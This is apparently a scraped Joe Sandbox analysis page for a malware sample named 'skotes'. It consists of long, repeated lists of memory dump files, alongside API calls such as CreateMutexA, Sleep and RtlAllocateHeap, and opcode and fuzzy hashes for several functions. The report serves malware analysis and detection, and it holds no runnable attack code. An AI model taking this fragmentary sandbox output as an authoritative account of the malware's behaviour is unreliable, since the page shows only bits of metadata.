Associated: 00000001.00000002.1800346707.0000000000AE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800363048.0000000000B42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800418860.0000000000B49000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800435375.0000000000B4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800453191.0000000000B57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800550797.0000000000CB6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800567785.0000000000CB8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800587909.0000000000CCF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800603980.0000000000CD1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800619957.0000000000CD2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800619957.0000000000CDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800653618.0000000000CDF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800669786.0000000000CE0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800686109.0000000000CE2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800702543.0000000000CE3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800718568.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800740314.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800756282.0000000000CE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800771785.0000000000CE7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800788918.0000000000CEF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800805984.0000000000CF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800826224.0000000000D09000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800842513.0000000000D0B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800858650.0000000000D0C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800874264.0000000000D0D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800890450.0000000000D0E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800907571.0000000000D14000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800923285.0000000000D15000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800940503.0000000000D1D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800955844.0000000000D1E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800972349.0000000000D23000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800992888.0000000000D38000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801009999.0000000000D3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801027442.0000000000D46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801044455.0000000000D49000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801061079.0000000000D4A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801077619.0000000000D50000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801093390.0000000000D51000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801109401.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801129641.0000000000D68000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801146718.0000000000D69000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801163034.0000000000D6B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801179569.0000000000D71000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801196950.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801214060.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801214060.0000000000DB8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801265616.0000000000DCE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801284225.0000000000DCF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801304743.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801325986.0000000000DE8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801344149.0000000000DE9000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801370653.0000000000DED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801390333.0000000000DEF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801410772.0000000000DFD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801430143.0000000000DFE000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ae0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 752c5658eafe29587abb317cd9e3981f0328468e8617a78c9045826af8b603d7
Instruction ID: e6ca8295786608999d9ca11e040dfa920c431969fdfe5b4588d01ef45a06d6e6
Opcode Fuzzy Hash: 752c5658eafe29587abb317cd9e3981f0328468e8617a78c9045826af8b603d7
Instruction Fuzzy Hash: 59217F313442849BFB24676E9D9673DB391DFA1300F34495AF408D73D2CFB569808193

Function 00AEA34F Relevance: 3.1, APIs: 2, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00AEA963
CreateMutexA.KERNELBASE(00000000,00000000,00B43254), ref: 00AEA981

Memory Dump Source

Source File: 00000001.00000002.1800363048.0000000000AE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000001.00000002.1800346707.0000000000AE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800363048.0000000000B42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800418860.0000000000B49000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800435375.0000000000B4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800453191.0000000000B57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800550797.0000000000CB6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800567785.0000000000CB8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800587909.0000000000CCF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800603980.0000000000CD1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800619957.0000000000CD2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800619957.0000000000CDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800653618.0000000000CDF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800669786.0000000000CE0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800686109.0000000000CE2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800702543.0000000000CE3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800718568.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800740314.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800756282.0000000000CE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800771785.0000000000CE7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800788918.0000000000CEF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800805984.0000000000CF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800826224.0000000000D09000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800842513.0000000000D0B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800858650.0000000000D0C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800874264.0000000000D0D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800890450.0000000000D0E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800907571.0000000000D14000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800923285.0000000000D15000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800940503.0000000000D1D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800955844.0000000000D1E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800972349.0000000000D23000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800992888.0000000000D38000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801009999.0000000000D3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801027442.0000000000D46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801044455.0000000000D49000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801061079.0000000000D4A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801077619.0000000000D50000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801093390.0000000000D51000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801109401.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801129641.0000000000D68000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801146718.0000000000D69000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801163034.0000000000D6B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801179569.0000000000D71000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801196950.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801214060.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801214060.0000000000DB8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801265616.0000000000DCE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801284225.0000000000DCF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801304743.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801325986.0000000000DE8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801344149.0000000000DE9000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801370653.0000000000DED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801390333.0000000000DEF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801410772.0000000000DFD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801430143.0000000000DFE000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ae0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 25dbd51684dbe8968f7dc7f4915207d82e751e1c926246bc181f1406811e53c8
Instruction ID: 46604db480513076d1710bcd200b92eb07b7311fe18d4551598f41de3d2ab4ee
Opcode Fuzzy Hash: 25dbd51684dbe8968f7dc7f4915207d82e751e1c926246bc181f1406811e53c8
Instruction Fuzzy Hash: 8C2179323002849BEB08AB6DDC8576CB7A2EBE2310F24461DF404DB7D5CBB5BA808253

Function 00B1D82F Relevance: 1.5, APIs: 1, Instructions: 40
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00B1A813,00000001,00000364,00000006,000000FF,?,00B1EE3F,?,00000004,00000000,?,?), ref: 00B1D871

Memory Dump Source

Source File: 00000001.00000002.1800363048.0000000000AE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000001.00000002.1800346707.0000000000AE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800363048.0000000000B42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800418860.0000000000B49000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800435375.0000000000B4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800453191.0000000000B57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800550797.0000000000CB6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800567785.0000000000CB8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800587909.0000000000CCF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800603980.0000000000CD1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800619957.0000000000CD2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800619957.0000000000CDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800653618.0000000000CDF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800669786.0000000000CE0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800686109.0000000000CE2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800702543.0000000000CE3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800718568.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800740314.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800756282.0000000000CE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800771785.0000000000CE7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800788918.0000000000CEF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800805984.0000000000CF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800826224.0000000000D09000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800842513.0000000000D0B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800858650.0000000000D0C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800874264.0000000000D0D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800890450.0000000000D0E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800907571.0000000000D14000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800923285.0000000000D15000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800940503.0000000000D1D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800955844.0000000000D1E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800972349.0000000000D23000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800992888.0000000000D38000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801009999.0000000000D3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801027442.0000000000D46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801044455.0000000000D49000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801061079.0000000000D4A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801077619.0000000000D50000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801093390.0000000000D51000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801109401.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801129641.0000000000D68000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801146718.0000000000D69000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801163034.0000000000D6B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801179569.0000000000D71000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801196950.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801214060.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801214060.0000000000DB8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801265616.0000000000DCE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801284225.0000000000DCF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801304743.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801325986.0000000000DE8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801344149.0000000000DE9000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801370653.0000000000DED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801390333.0000000000DEF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801410772.0000000000DFD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801430143.0000000000DFE000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ae0000_skotes.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: f18743a714c46be55c25e40916ce85a5085a4773bae0789082e9d52f0fa9f5af
Instruction ID: 44eaa28040db763f807bc0525648455c1cb8d7d2692dee50d7fde71b5361333a
Opcode Fuzzy Hash: f18743a714c46be55c25e40916ce85a5085a4773bae0789082e9d52f0fa9f5af
Instruction Fuzzy Hash: 4FF0823265522566EF217A769C01ADB77D9EF86770B9981A1AD08A7181EF30DC8086E0

Non-executed Functions

Function 00B1CBDF Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00B1CC66

Memory Dump Source

Source File: 00000001.00000002.1800363048.0000000000AE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000001.00000002.1800346707.0000000000AE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800363048.0000000000B42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800418860.0000000000B49000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800435375.0000000000B4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800453191.0000000000B57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800550797.0000000000CB6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800567785.0000000000CB8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800587909.0000000000CCF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800603980.0000000000CD1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800619957.0000000000CD2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800619957.0000000000CDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800653618.0000000000CDF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800669786.0000000000CE0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800686109.0000000000CE2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800702543.0000000000CE3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800718568.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800740314.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800756282.0000000000CE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800771785.0000000000CE7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800788918.0000000000CEF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800805984.0000000000CF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800826224.0000000000D09000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800842513.0000000000D0B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800858650.0000000000D0C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800874264.0000000000D0D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800890450.0000000000D0E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800907571.0000000000D14000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800923285.0000000000D15000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800940503.0000000000D1D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800955844.0000000000D1E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800972349.0000000000D23000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800992888.0000000000D38000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801009999.0000000000D3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801027442.0000000000D46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801044455.0000000000D49000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801061079.0000000000D4A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801077619.0000000000D50000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801093390.0000000000D51000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801109401.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801129641.0000000000D68000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801146718.0000000000D69000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801163034.0000000000D6B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801179569.0000000000D71000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801196950.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801214060.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801214060.0000000000DB8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801265616.0000000000DCE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801284225.0000000000DCF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801304743.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801325986.0000000000DE8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801344149.0000000000DE9000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801370653.0000000000DED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801390333.0000000000DEF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801410772.0000000000DFD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801430143.0000000000DFE000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ae0000_skotes.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: ff3b895da8359e455593cab76a85431316fff6c614e69054163c5cc9de6e39d3
Instruction ID: 0d3195f238bd8c91d2ab648d7e33f6a911983e8bc3f669471671377f68c2db99
Opcode Fuzzy Hash: ff3b895da8359e455593cab76a85431316fff6c614e69054163c5cc9de6e39d3
Instruction Fuzzy Hash: 3EB123329442959FDB11CF28C8817EEBFE5EF45340F6481FAE855EB242D6349D82CBA0

Function 00AE2EC0 Relevance: 6.3, APIs: 4, Instructions: 272COMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 00AE2F5F
__Mtx_unlock.LIBCPMT ref: 00AE2FCC
__Mtx_unlock.LIBCPMT ref: 00AE30F5
__Mtx_unlock.LIBCPMT ref: 00AE319B

Memory Dump Source

Source File: 00000001.00000002.1800363048.0000000000AE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000001.00000002.1800346707.0000000000AE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800363048.0000000000B42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800418860.0000000000B49000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800435375.0000000000B4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800453191.0000000000B57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800550797.0000000000CB6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800567785.0000000000CB8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800587909.0000000000CCF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800603980.0000000000CD1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800619957.0000000000CD2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800619957.0000000000CDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800653618.0000000000CDF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800669786.0000000000CE0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800686109.0000000000CE2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800702543.0000000000CE3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800718568.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800740314.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800756282.0000000000CE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800771785.0000000000CE7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800788918.0000000000CEF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800805984.0000000000CF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800826224.0000000000D09000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800842513.0000000000D0B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800858650.0000000000D0C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800874264.0000000000D0D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800890450.0000000000D0E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800907571.0000000000D14000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800923285.0000000000D15000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800940503.0000000000D1D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800955844.0000000000D1E000.00000080.00000001.01000000.00000007.sdmpDownload File
